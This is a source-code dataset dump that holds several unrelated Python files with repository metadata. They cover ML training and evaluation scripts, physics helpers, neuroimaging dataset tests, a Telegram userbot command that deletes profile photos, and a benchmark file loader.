pad_input_matrix(unpadded_segment_ids, self.args.max_doc_length)
padded_input_ids = torch.tensor(unpadded_input_ids, dtype=torch.long)
padded_input_mask = torch.tensor(unpadded_input_mask, dtype=torch.long)
padded_segment_ids = torch.tensor(unpadded_segment_ids, dtype=torch.long)
padded_emotion_ids = torch.tensor(unpadded_emotion_ids, dtype=torch.long)
label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)
eval_data = TensorDataset(padded_input_ids, padded_input_mask, padded_segment_ids, padded_emotion_ids, label_ids)
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=self.args.batch_size)
self.model.eval()
bert_layers_l, label_ids_l = [], []
for input_ids, input_mask, segment_ids, emotion_ids, label_ids in tqdm(eval_dataloader, desc="Evaluating", disable=silent):
input_ids = input_ids.to(self.args.device)
input_mask = input_mask.to(self.args.device)
segment_ids = segment_ids.to(self.args.device)
emotion_ids = emotion_ids.to(self.args.device)
label_ids = label_ids.to(self.args.device)
with torch.no_grad():
bert_layers = self.model.get_bert_embedding(input_ids, segment_ids, input_mask, emotion_ids=emotion_ids, last_bert_layers=last_bert_layers)
label_ids = torch.argmax(label_ids, dim=1).cpu().detach().numpy()
bert_layers_l.extend(bert_layers)
label_ids_l.extend(label_ids)
bert_layers_l = torch.stack(bert_layers_l, dim=0)
return bert_layers_l, label_ids_l
| 51.582418
| 166
| 0.678526
| 1,188
| 9,388
| 5.022727
| 0.127104
| 0.041562
| 0.018435
| 0.016759
| 0.686275
| 0.651249
| 0.604491
| 0.589073
| 0.580694
| 0.549858
| 0
| 0.003474
| 0.233383
| 9,388
| 181
| 167
| 51.867403
| 0.825622
| 0.004048
| 0
| 0.450704
| 0
| 0
| 0.028263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021127
| false
| 0
| 0.077465
| 0
| 0.126761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
881189eb3c68f5eb6d4b3bde9fa97065430d1651
| 781
|
py
|
Python
|
model/mlp1.py
|
andrearosasco/DistilledReplay
|
2a4efa88d22b9afc7016f07549114688f346dbe8
|
[
"MIT"
] | 7
|
2021-06-27T16:09:13.000Z
|
2022-03-17T20:02:55.000Z
|
model/mlp1.py
|
andrew-r96/DistilledReplay
|
2a4efa88d22b9afc7016f07549114688f346dbe8
|
[
"MIT"
] | null | null | null |
model/mlp1.py
|
andrew-r96/DistilledReplay
|
2a4efa88d22b9afc7016f07549114688f346dbe8
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self, config):
super(Model, self).__init__()
self.drop = nn.Dropout(config['dropout'])
self.fc1 = nn.Linear(784, 2000)
self.fc2 = nn.Linear(2000, 2000)
self.fc3 = nn.Linear(2000, 2000)
self.fc4 = nn.Linear(2000, 2000)
self.fc5 = nn.Linear(2000, 10)
def forward(self, x):
# 784 -> 2000
x = F.relu(self.drop(self.fc1(x)))
# 2000 -> 2000
x = F.relu(self.drop(self.fc2(x)))
# 2000 -> 2000
x = F.relu(self.drop(self.fc3(x)))
# 2000 -> 2000
x = F.relu(self.drop(self.fc4(x)))
# 2000 -> 100
x = self.fc5(x)
return x
| 28.925926
| 50
| 0.516005
| 111
| 781
| 3.558559
| 0.27027
| 0.121519
| 0.121519
| 0.101266
| 0.412658
| 0.260759
| 0.260759
| 0.205063
| 0.205063
| 0
| 0
| 0.162835
| 0.331626
| 781
| 27
| 51
| 28.925926
| 0.59387
| 0.079385
| 0
| 0
| 0
| 0
| 0.010174
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
881335d234ca66e078e1413e1e2269e82e80ed06
| 5,709
|
py
|
Python
|
train.py
|
VArdulov/learning-kis
|
2637f08d5e8027a22feff17064be45ea51f738e5
|
[
"MIT"
] | null | null | null |
train.py
|
VArdulov/learning-kis
|
2637f08d5e8027a22feff17064be45ea51f738e5
|
[
"MIT"
] | null | null | null |
train.py
|
VArdulov/learning-kis
|
2637f08d5e8027a22feff17064be45ea51f738e5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
""" Learning Koopman Invariant Subspace
(c) Naoya Takeishi, 2017.
takeishi@ailab.t.u-tokyo.ac.jp
"""
import numpy as np
np.random.seed(1234567890)
from argparse import ArgumentParser
from os import path
import time
from lkis import TimeSeriesBatchMaker, KoopmanInvariantSubspaceLearner
from losses import combined_loss
from torch import device, save, manual_seed
from torch.optim import SGD
import matplotlib.pyplot as plt
import seaborn as sns
# -- Parse arguments
t = time.time()
parser = ArgumentParser(description='Learning Koopman Invariant Subspace (Now with PyTorch!)')
parser.add_argument("--name", "-n", type=str, default=f"lkis-{int(time.time())}", help="name of experiment")
parser.add_argument("--data-path", type=str, default="./train.npy", help="time-series data to model")
parser.add_argument("--epochs", "-e", type=int, default=1000, help="number of epochs to train for")
parser.add_argument("--num-batches", "-b", type=int, default=1, help="how many batchs for break the data up into")
parser.add_argument("--gpu", action="store_true", default=False, help="use a GPU or no")
parser.add_argument("--intermediate-observable", "-i", type=int, default=-1, help="intermediate dimensional observation space")
parser.add_argument("--save-model", "-m", action="store_true", default=False, help="whether or not you want the model saved to $name$.torch.mdl")
parser.add_argument("--save-training-plot", "-p", action="store_true", default=False, help="where to save plotting")
parser.add_argument("--max-lag", "-l", type=int, default=-1, help="maximum_lag")
parser.add_argument("--state-space", "-s", type=int, default=1, help="dimensionality of the underlying state space")
parser.add_argument("--alpha", "-a", type=float, default=1.0, help="value to score the reconstruction loss by")
parser.add_argument("--learning-rate", "-r", type=float, default=0.001, help="Optimizer learning rate")
parser.add_argument("--validation-data-path", "-v", type=str, default="")
#ToDo: Implement
parser.add_argument("--dmd", action="store_true", default=False, help="Execute and save the DMD on the training set")
if __name__ == "__main__":
# grab the command line arguments
cli_args = parser.parse_args()
manual_seed(216)
# find and load the training data
data_path = cli_args.data_path
print(f"Loading training data from {data_path}")
data_train = np.load(data_path)
if len(data_train.shape) == 1:
data_train = data_train.reshape(-1, 1)
print(f"Loaded a dataset with dimension: {data_train.shape}")
validate = cli_args.validation_data_path != ""
data_val = None
if validate:
data_path = cli_args.validation_data_path
print(f"Loading validation data from {data_path}")
data_val = np.load(data_path)
# process the delay either set by the user or is set to one 10th of the data
delay = cli_args.max_lag if cli_args.max_lag > 0 else (data_train.shape[0] // 10)
# based on the number of batches, delay, and size of the data compute the samples per batch
samples_per_batch = (data_train.shape[0] - delay) // cli_args.num_batches
# construct the data preparer
batch_iterator = TimeSeriesBatchMaker(
y=data_train,
batch_size=samples_per_batch,
max_lag=delay
)
if validate:
val_batch_iterator = TimeSeriesBatchMaker(
y=data_val,
max_lag=delay
)
# construct the end-to-end model
lkis = KoopmanInvariantSubspaceLearner(
observable_dim=data_train.shape[1],
latent_dim=cli_args.state_space,
intermediate_observable=cli_args.intermediate_observable,
delay=delay
)
if cli_args.gpu:
device = device("cuda")
# initialize the optimizer
optimizer = SGD(lkis.parameters(), lr=cli_args.learning_rate)
losses = []
val_losses = []
for epoch in range(cli_args.epochs):
loss = 0
for b in range(cli_args.num_batches):
optimizer.zero_grad()
time_delayed_ys, y_true = next(batch_iterator)
if cli_args.gpu:
time_delayed_ys.to(device)
y_true.to(device)
g_pred, y_pred = lkis(time_delayed_ys)
g_0 = g_pred[:-1]
g_1 = g_pred[1:]
batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
batch_loss.backward()
optimizer.step()
loss += batch_loss.item()
# display the epoch training loss
print(f"epoch : {epoch + 1}/{cli_args.epochs}, loss = {loss:.6f}")
losses.append(loss)
if validate:
y_time_delayed_val, y_true = next(val_batch_iterator)
if cli_args.gpu:
y_time_delayed_val.to(device)
y_true.to(device)
g_pred, y_pred = lkis(y_time_delayed_val)
g_0 = g_pred[:-1]
g_1 = g_pred[1:]
batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
val_loss = batch_loss.item()
print(f"\tval-loss = {val_loss:.6f}")
val_losses.append(val_loss)
if cli_args.save_model:
save(lkis, f"{cli_args.name}.torch.mdl")
if cli_args.save_training_plot:
sns.lineplot(x=list(range(cli_args.epochs)), y=losses, label="training loss")
if validate:
sns.lineplot(x=list(range(cli_args.epochs)), y=val_losses, label="validation loss")
plt.xlabel("Epochs")
plt.ylabel("Combined Reconstruction and DMD Loss")
plt.title(f"Training Loss for {cli_args.name}")
plt.savefig(f"{cli_args.name}-training-loss.png")
| 38.574324
| 145
| 0.669294
| 825
| 5,709
| 4.432727
| 0.266667
| 0.044025
| 0.065081
| 0.016407
| 0.196883
| 0.121411
| 0.073831
| 0.073831
| 0.073831
| 0.05469
| 0
| 0.013932
| 0.207917
| 5,709
| 147
| 146
| 38.836735
| 0.794781
| 0.088632
| 0
| 0.163462
| 0
| 0
| 0.216712
| 0.028753
| 0
| 0
| 0
| 0.006803
| 0
| 1
| 0
| false
| 0
| 0.096154
| 0
| 0.096154
| 0.048077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8813da3968ae4a879a3ffd1fca43f066e89df5ea
| 671
|
py
|
Python
|
Algorithms/Easy/1200. Minimum Absolute Difference/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
Algorithms/Easy/1200. Minimum Absolute Difference/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
Algorithms/Easy/1200. Minimum Absolute Difference/answer.py
|
KenWoo/Algorithm
|
4012a2f0a099a502df1e5df2e39faa75fe6463e8
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
class Solution:
def minimumAbsDifference(self, arr: List[int]) -> List[List[int]]:
arr.sort()
res = []
min_diff = arr[1] - arr[0]
res.append([arr[0], arr[1]])
for i in range(1, len(arr)-1):
diff = arr[i+1]-arr[i]
if diff < min_diff:
min_diff = diff
res.clear()
res.append([arr[i], arr[i+1]])
elif diff == min_diff:
res.append([arr[i], arr[i+1]])
return res
if __name__ == "__main__":
s = Solution()
result = s.minimumAbsDifference([3, 8, -10, 23, 19, -4, -14, 27])
print(result)
| 26.84
| 70
| 0.490313
| 91
| 671
| 3.483516
| 0.43956
| 0.07571
| 0.113565
| 0.082019
| 0.113565
| 0.113565
| 0.113565
| 0
| 0
| 0
| 0
| 0.050459
| 0.350224
| 671
| 24
| 71
| 27.958333
| 0.676606
| 0
| 0
| 0.1
| 0
| 0
| 0.011923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.2
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8814231575bbe6e4934834a1434e867f02c0e57d
| 2,125
|
py
|
Python
|
resources/physequations.py
|
VijayStroup/Physics_Problem_Solver_Basic
|
fc6944475ed8bcfe91bbd207734c3f9aee31e0fe
|
[
"MIT"
] | null | null | null |
resources/physequations.py
|
VijayStroup/Physics_Problem_Solver_Basic
|
fc6944475ed8bcfe91bbd207734c3f9aee31e0fe
|
[
"MIT"
] | null | null | null |
resources/physequations.py
|
VijayStroup/Physics_Problem_Solver_Basic
|
fc6944475ed8bcfe91bbd207734c3f9aee31e0fe
|
[
"MIT"
] | null | null | null |
import math
def close(expected, actual, maxerror):
'''checks to see if the actual number is within expected +- maxerror.'''
low = expected - maxerror
high = expected + maxerror
if actual >= low and actual <= high:
return True
else:
return False
def grav_potential_energy(mass, height, gravity=9.81):
'''calculate potential energy given mass and height. Mass in
kilograms and height in meters.'''
gp_energy = mass * height * gravity
return gp_energy
def kin_energy(mass, velocity):
'''calculate kinetic energy given mass and velocity. Mass in
kilograms and velocity in meters per second.'''
k_energy = .5 * mass * velocity ** 2
return k_energy
def work_energy(force, displacement, angle):
'''calculate work energy given force, displancement,
and angle. Force in newtons, displacement in meters, angle in degrees.'''
anglerad = math.radians(angle)
cos = math.cos(anglerad)
w_energy = force * displacement * cos
return w_energy
'''=============================================================================
Tests
============================================================================='''
if __name__ == '__main__':
def check(funcname, args, expected, ans, maxerror):
if not close(expected, ans, maxerror):
print(f'{funcname}({args}) = {ans} should = {expected}')
print(close(10, 11.1, 1))
print(close(100, 100.001, .01))
print(close(-10, -11.01, 1))
print(close(84756, 84300.2, 500.5))
#gravitional potential energy tests
ans = grav_potential_energy(3.00, 7.00)
check('grav_potential_energy', '3.00, 7.00', 206.01, ans, 0.00000000000000000000000001)
ans = grav_potential_energy(2.00, 5.00)
check('grav_potential_energy', '2.00, 5.00', 98.1, ans, 0.01)
#kinetic energy tests
ans = kin_energy(2, 6.55)
check('kin_energy', '2, 6.55', 42.90, ans, 0.01)
ans = kin_energy(5.65, 10)
check('kin_energy', '5.65, 10', 282.5, ans, 0.1)
#work energy tests
ans = work_energy(500, 10, 0)
check('work_energy', '500, 10, 0', 5000.0, ans, 0.1)
ans = work_energy(150, 50, 45)
check('work_energy', '150, 50, 45', 5303.30, ans, 0.01)
| 32.19697
| 88
| 0.631059
| 304
| 2,125
| 4.299342
| 0.3125
| 0.080337
| 0.072686
| 0.035195
| 0.175976
| 0.076511
| 0.076511
| 0
| 0
| 0
| 0
| 0.100845
| 0.164706
| 2,125
| 65
| 89
| 32.692308
| 0.635493
| 0.212706
| 0
| 0
| 0
| 0
| 0.135192
| 0.029268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128205
| false
| 0
| 0.025641
| 0
| 0.282051
| 0.128205
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
71467296157c3ad9afffaf380b92ae10d722c419
| 10,659
|
py
|
Python
|
mvpa2/tests/test_erdataset.py
|
andycon/PyMVPA
|
67f7ee68012e3a1128168c583d6c83303b7a2c27
|
[
"MIT"
] | null | null | null |
mvpa2/tests/test_erdataset.py
|
andycon/PyMVPA
|
67f7ee68012e3a1128168c583d6c83303b7a2c27
|
[
"MIT"
] | null | null | null |
mvpa2/tests/test_erdataset.py
|
andycon/PyMVPA
|
67f7ee68012e3a1128168c583d6c83303b7a2c27
|
[
"MIT"
] | null | null | null |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the PyMVPA package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
'''Tests for the event-related dataset'''
from mvpa2.testing import *
from mvpa2.datasets import dataset_wizard
from mvpa2.mappers.flatten import FlattenMapper
from mvpa2.mappers.boxcar import BoxcarMapper
from mvpa2.mappers.fx import FxMapper
from mvpa2.datasets.eventrelated import find_events, eventrelated_dataset, \
extract_boxcar_event_samples
from mvpa2.datasets.sources import load_example_fmri_dataset
from mvpa2.mappers.zscore import zscore
def test_erdataset():
# 3 chunks, 5 targets, blocks of 5 samples each
nchunks = 3
ntargets = 5
blocklength = 5
nfeatures = 10
targets = np.tile(np.repeat(range(ntargets), blocklength), nchunks)
chunks = np.repeat(np.arange(nchunks), ntargets * blocklength)
samples = np.repeat(
np.arange(nchunks * ntargets * blocklength),
nfeatures).reshape(-1, nfeatures)
ds = dataset_wizard(samples, targets=targets, chunks=chunks)
# check if events are determined properly
evs = find_events(targets=ds.sa.targets, chunks=ds.sa.chunks)
for ev in evs:
assert_equal(ev['duration'], blocklength)
assert_equal(ntargets * nchunks, len(evs))
for t in range(ntargets):
assert_equal(len([ev for ev in evs if ev['targets'] == t]),
nchunks)
# now turn `ds` into an eventreleated dataset
erds = eventrelated_dataset(ds, evs)
# the only unprefixed sample attributes are
assert_equal(sorted([a for a in ds.sa if not a.startswith('event')]),
['chunks', 'targets'])
# samples as expected?
assert_array_equal(erds.samples[0],
np.repeat(np.arange(blocklength), nfeatures))
# that should also be the temporal feature offset
assert_array_equal(erds.samples[0], erds.fa.event_offsetidx)
assert_array_equal(erds.sa.event_onsetidx, np.arange(0,71,5))
# finally we should see two mappers
assert_equal(len(erds.a.mapper), 2)
assert_true(isinstance(erds.a.mapper[0], BoxcarMapper))
assert_true(isinstance(erds.a.mapper[1], FlattenMapper))
# check alternative event mapper
# this one does temporal compression by averaging
erds_compress = eventrelated_dataset(
ds, evs, event_mapper=FxMapper('features', np.mean))
assert_equal(len(erds), len(erds_compress))
assert_array_equal(erds_compress.samples[:,0], np.arange(2,73,5))
#
# now check the same dataset with event descretization
tr = 2.5
ds.sa['time'] = np.arange(nchunks * ntargets * blocklength) * tr
evs = [{'onset': 4.9, 'duration': 6.2}]
# doesn't work without conversion
assert_raises(ValueError, eventrelated_dataset, ds, evs)
erds = eventrelated_dataset(ds, evs, time_attr='time')
assert_equal(len(erds), 1)
assert_array_equal(erds.samples[0], np.repeat(np.arange(1,5), nfeatures))
assert_array_equal(erds.sa.orig_onset, [evs[0]['onset']])
assert_array_equal(erds.sa.orig_duration, [evs[0]['duration']])
assert_array_almost_equal(erds.sa.orig_offset, [2.4])
assert_array_equal(erds.sa.time, [np.arange(2.5, 11, 2.5)])
# now with closest match
erds = eventrelated_dataset(ds, evs, time_attr='time', match='closest')
expected_nsamples = 3
assert_equal(len(erds), 1)
assert_array_equal(erds.samples[0],
np.repeat(np.arange(2,2+expected_nsamples),
nfeatures))
assert_array_equal(erds.sa.orig_onset, [evs[0]['onset']])
assert_array_equal(erds.sa.orig_duration, [evs[0]['duration']])
assert_array_almost_equal(erds.sa.orig_offset, [-0.1])
assert_array_equal(erds.sa.time, [np.arange(5.0, 11, 2.5)])
# now test the way back
results = np.arange(erds.nfeatures)
assert_array_equal(erds.a.mapper.reverse1(results),
results.reshape(expected_nsamples, nfeatures))
# what about multiple results?
nresults = 5
results = dataset_wizard([results] * nresults)
# and let's have an attribute to make it more difficult
results.sa['myattr'] = np.arange(5)
rds = erds.a.mapper.reverse(results)
assert_array_equal(rds,
results.samples.reshape(nresults * expected_nsamples,
nfeatures))
assert_array_equal(rds.sa.myattr, np.repeat(results.sa.myattr,
expected_nsamples))
evs = [dict(onset=12, duration=2), dict(onset=70, duration=3)]
evds = extract_boxcar_event_samples(ds, evs)
# it goes for the max of all durations
assert_equal(evds.shape, (len(evs), 3 * ds.nfeatures))
# overide duration
evds = extract_boxcar_event_samples(ds, evs, event_duration=1)
assert_equal(evds.shape, (len(evs), 1 * ds.nfeatures))
assert_equal(np.unique(evds.samples[1]), 70)
# overide onset
evds = extract_boxcar_event_samples(ds, evs, event_offset=2)
assert_equal(evds.shape, (len(evs), 3 * ds.nfeatures))
assert_equal(np.unique(evds.samples[1,:10]), 72)
# overide both
evds = extract_boxcar_event_samples(ds, evs, event_offset=-2,
event_duration=1)
assert_equal(evds.shape, (len(evs), 1 * ds.nfeatures))
assert_equal(np.unique(evds.samples[1]), 68)
def test_hrf_modeling():
skip_if_no_external('nibabel')
skip_if_no_external('nipy') # ATM relies on NiPy's GLM implementation
ds = load_example_fmri_dataset('25mm', literal=True)
# TODO: simulate short dataset with known properties and use it
# for testing
events = find_events(targets=ds.sa.targets, chunks=ds.sa.chunks)
tr = ds.a.imghdr['pixdim'][4]
for ev in events:
for a in ('onset', 'duration'):
ev[a] = ev[a] * tr
evds = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
# same voxels
assert_equal(ds.nfeatures, evds.nfeatures)
assert_array_equal(ds.fa.voxel_indices, evds.fa.voxel_indices)
# one sample for each condition, plus constant
assert_equal(sorted(ds.sa['targets'].unique), sorted(evds.sa.targets))
assert_equal(evds.a.add_regs.sa.regressor_names[0], 'constant')
# with centered data
zscore(ds)
evds_demean = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
# after demeaning the constant should consume a lot less
assert(evds.a.add_regs[0].samples.mean()
> evds_demean.a.add_regs[0].samples.mean())
# from eyeballing the sensitivity example -- would be better to test this on
# the tutorial data
assert(evds_demean[evds.sa.targets == 'shoe'].samples.max() \
> evds_demean[evds.sa.targets == 'bottle'].samples.max())
# HRF models
assert('regressors' in evds.sa)
assert('regressors' in evds.a.add_regs.sa)
assert_equal(evds.sa.regressors.shape[1], len(ds))
# custom regressors
evds_regrs = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
regr_attrs=['time_indices'],
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
# verify that nothing screwed up time_coords
assert_equal(ds.sa.time_coords[0], 0)
assert_equal(len(evds_regrs), len(evds))
# one more output sample in .a.add_regs
assert_equal(len(evds_regrs.a.add_regs) - 1, len(evds.a.add_regs))
# comes last before constant
assert_equal('time_indices', evds_regrs.a.add_regs.sa.regressor_names[-2])
# order of main regressors is unchanged
assert_array_equal(evds.sa.targets, evds_regrs.sa.targets)
# custom regressors from external sources
evds_regrs = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr='targets',
regr_attrs=['time_coords'],
design_kwargs=dict(drift_model='blank',
add_regs=np.linspace(1, -1, len(ds))[None].T,
add_reg_names=['negative_trend']),
glmfit_kwargs=dict(model='ols'),
model='hrf')
assert_equal(len(evds_regrs), len(evds))
# But we got one more in additional regressors
assert_equal(len(evds_regrs.a.add_regs) - 2, len(evds.a.add_regs))
# comes last before constant
assert_array_equal(['negative_trend', 'time_coords', 'constant'],
evds_regrs.a.add_regs.sa.regressor_names)
# order is otherwise unchanged
assert_array_equal(evds.sa.targets, evds_regrs.sa.targets)
# HRF models with estimating per each chunk
assert_equal(ds.sa.time_coords[0], 0)
evds_regrs = eventrelated_dataset(ds, events, time_attr='time_coords',
condition_attr=['targets', 'chunks'],
regr_attrs=['time_indices'],
design_kwargs=dict(drift_model='blank'),
glmfit_kwargs=dict(model='ols'),
model='hrf')
assert_true('add_regs' in evds_regrs.a)
assert_true('time_indices' in evds_regrs.a.add_regs.sa.regressor_names)
assert_equal(len(ds.UC) * len(ds.UT), len(evds_regrs))
assert_equal(len(evds_regrs.UC) * len(evds_regrs.UT), len(evds_regrs))
from mvpa2.mappers.fx import mean_group_sample
evds_regrs_meaned = mean_group_sample(['targets'])(evds_regrs)
assert_array_equal(evds_regrs_meaned.T, evds.T) # targets should be the same
#corr = np.corrcoef(np.vstack((evds.samples, evds_regrs_meaned)))
#import pydb; pydb.debugger()
#pass
#i = 1
| 48.45
| 96
| 0.626888
| 1,369
| 10,659
| 4.700511
| 0.211833
| 0.047863
| 0.049728
| 0.040404
| 0.44289
| 0.404196
| 0.366589
| 0.33986
| 0.271329
| 0.254701
| 0
| 0.014513
| 0.250117
| 10,659
| 219
| 97
| 48.671233
| 0.790567
| 0.164837
| 0
| 0.275641
| 0
| 0
| 0.052252
| 0
| 0
| 0
| 0
| 0.004566
| 0.378205
| 1
| 0.012821
| false
| 0
| 0.057692
| 0
| 0.070513
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7148d1a57a15a29836e2ab0aae7b7bc5dc398f57
| 1,174
|
py
|
Python
|
userbot/plugins/delfp.py
|
aksr-aashish/FIREXUSERBOT
|
dff0b7bf028cb27779626ce523402346cc990402
|
[
"MIT"
] | null | null | null |
userbot/plugins/delfp.py
|
aksr-aashish/FIREXUSERBOT
|
dff0b7bf028cb27779626ce523402346cc990402
|
[
"MIT"
] | 1
|
2022-01-09T11:35:06.000Z
|
2022-01-09T11:35:06.000Z
|
userbot/plugins/delfp.py
|
aksr-aashish/FIREXUSERBOT
|
dff0b7bf028cb27779626ce523402346cc990402
|
[
"MIT"
] | null | null | null |
from telethon.tl.functions.photos import DeletePhotosRequest, GetUserPhotosRequest
from telethon.tl.types import InputPhoto
from userbot.cmdhelp import CmdHelp
from userbot.utils import admin_cmd, edit_or_reply, sudo_cmd
CmdHelp("delfp").add_command("delpfp", None, "delete ur currnt profile picture").add()
@borg.on(admin_cmd(pattern="delpfp ?(.*)"))
@borg.on(sudo_cmd(pattern="delpfp ?(.*)", allow_sudo=True))
async def remove_profilepic(delpfp):
"""For .delpfp command, delete your current profile picture in Telegram."""
group = delpfp.text[8:]
if group == "all":
lim = 0
elif group.isdigit():
lim = int(group)
else:
lim = 1
pfplist = await delpfp.client(
GetUserPhotosRequest(user_id=delpfp.from_id, offset=0, max_id=0, limit=lim)
)
input_photos = [InputPhoto(
id=sep.id,
access_hash=sep.access_hash,
file_reference=sep.file_reference,
) for sep in pfplist.photos]
await delpfp.client(DeletePhotosRequest(id=input_photos))
await edit_or_reply(
delpfp, f"`Successfully deleted {len(input_photos)} profile picture(s).`"
)
| 34.529412
| 86
| 0.67632
| 149
| 1,174
| 5.187919
| 0.496644
| 0.054334
| 0.036223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005371
| 0.206985
| 1,174
| 33
| 87
| 35.575758
| 0.824919
| 0
| 0
| 0
| 0
| 0
| 0.120109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.148148
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7149245bb6b3dda015cca0a397d867fb3542c00d
| 1,308
|
py
|
Python
|
amlb/benchmarks/file.py
|
pplonski/automlbenchmark
|
f49ddfa2583643173296ed8ab45a8c14c62a6987
|
[
"MIT"
] | 282
|
2018-09-19T09:45:46.000Z
|
2022-03-30T04:05:51.000Z
|
amlb/benchmarks/file.py
|
pplonski/automlbenchmark
|
f49ddfa2583643173296ed8ab45a8c14c62a6987
|
[
"MIT"
] | 267
|
2018-11-02T11:43:11.000Z
|
2022-03-31T08:58:16.000Z
|
amlb/benchmarks/file.py
|
pplonski/automlbenchmark
|
f49ddfa2583643173296ed8ab45a8c14c62a6987
|
[
"MIT"
] | 104
|
2018-10-17T19:32:36.000Z
|
2022-03-19T22:47:59.000Z
|
import logging
import os
from typing import List, Tuple, Optional
from amlb.utils import config_load, Namespace
log = logging.getLogger(__name__)
def _find_local_benchmark_definition(name: str, benchmark_definition_dirs: List[str]) -> str:
# 'name' should be either a full path to the benchmark,
# or a filename (without extension) in the benchmark directory.
if os.path.exists(name):
return name
for bd in benchmark_definition_dirs:
bf = os.path.join(bd, f"{name}.yaml")
if os.path.exists(bf):
# We don't account for duplicate definitions (yet).
return bf
# should we support s3 and check for s3 path before raising error?
raise ValueError(f"Incorrect benchmark name or path `{name}`, name not available in {benchmark_definition_dirs}.")
def load_file_benchmark(name: str, benchmark_definition_dirs: List[str]) -> Tuple[str, Optional[str], List[Namespace]]:
""" Loads benchmark from a local file. """
benchmark_file = _find_local_benchmark_definition(name, benchmark_definition_dirs)
log.info("Loading benchmark definitions from %s.", benchmark_file)
tasks = config_load(benchmark_file)
benchmark_name, _ = os.path.splitext(os.path.basename(benchmark_file))
return benchmark_name, benchmark_file, tasks
| 39.636364
| 119
| 0.727829
| 180
| 1,308
| 5.1
| 0.405556
| 0.14488
| 0.125272
| 0.061002
| 0.14597
| 0.08061
| 0.08061
| 0
| 0
| 0
| 0
| 0.001867
| 0.181193
| 1,308
| 32
| 120
| 40.875
| 0.855275
| 0.204128
| 0
| 0
| 0
| 0
| 0.13773
| 0.027158
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.210526
| 0
| 0.473684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
